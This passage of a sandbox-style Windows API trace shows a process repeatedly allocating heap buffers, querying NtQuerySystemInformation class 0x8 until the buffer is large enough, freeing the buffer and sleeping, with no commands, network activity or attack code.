hHeap=0x2560000) returned 1 [0301.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.876] Sleep (dwMilliseconds=0x110) [0301.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0301.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0301.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0301.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0301.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0301.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.890] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0301.890] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ce78 [0301.890] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ce78, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ce78, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ce78 | out: hHeap=0x2560000) returned 1 [0301.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.891] Sleep (dwMilliseconds=0x110) [0301.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0301.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0301.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0301.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0301.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0301.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0301.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0301.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c770, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c770 | out: hHeap=0x2560000) returned 1 [0301.911] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.911] Sleep (dwMilliseconds=0x110) [0301.919] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0301.919] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0301.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a5a8 [0301.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a5a8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a5a8 | out: hHeap=0x2560000) returned 1 [0301.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0301.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0301.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0301.921] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0301.922] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.922] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.923] Sleep (dwMilliseconds=0x110) [0301.935] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0301.936] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.936] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0301.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0301.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0301.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0301.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0301.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0301.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0301.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.942] Sleep (dwMilliseconds=0x110) [0301.953] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0301.953] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.954] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0301.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0301.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0301.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0301.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0301.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0301.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0301.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.957] Sleep (dwMilliseconds=0x110) [0301.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0301.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.968] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0301.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0301.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0301.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0301.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0301.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0301.970] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0301.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.970] Sleep (dwMilliseconds=0x110) [0301.986] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0301.986] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0301.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a748 [0301.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a748, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a748, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.987] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a748 | out: hHeap=0x2560000) returned 1 [0301.987] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0301.987] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0301.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0301.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0301.988] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0301.988] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0301.988] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0301.989] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0301.989] Sleep (dwMilliseconds=0x110) [0302.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0302.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0302.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0302.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0302.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0302.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0302.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0302.004] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0302.004] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.004] Sleep (dwMilliseconds=0x110) [0302.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0302.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0302.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0302.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0302.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295be90 [0302.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295be90, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295be90, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295be90 | out: hHeap=0x2560000) returned 1 [0302.032] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0302.032] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0302.033] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.033] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.033] Sleep (dwMilliseconds=0x110) [0302.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0302.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0302.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0302.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0302.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0302.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0302.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0302.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0302.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.050] Sleep (dwMilliseconds=0x110) [0302.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7c0 [0302.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7c0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7c0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7c0 | out: hHeap=0x2560000) returned 1 [0302.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0302.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0302.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0302.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0302.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0302.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0302.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.064] Sleep (dwMilliseconds=0x110) [0302.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0302.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0302.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0302.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0302.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0302.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0302.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0302.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0302.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.079] Sleep (dwMilliseconds=0x110) [0302.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0302.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0302.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0302.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.096] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0302.096] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0302.096] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0302.097] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0302.097] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0302.097] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0302.100] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0302.101] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0302.101] Sleep (dwMilliseconds=0x110) [0302.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0302.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0302.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0302.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0302.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0302.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0302.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0302.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c770 [0302.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c770, Length=0xc0, 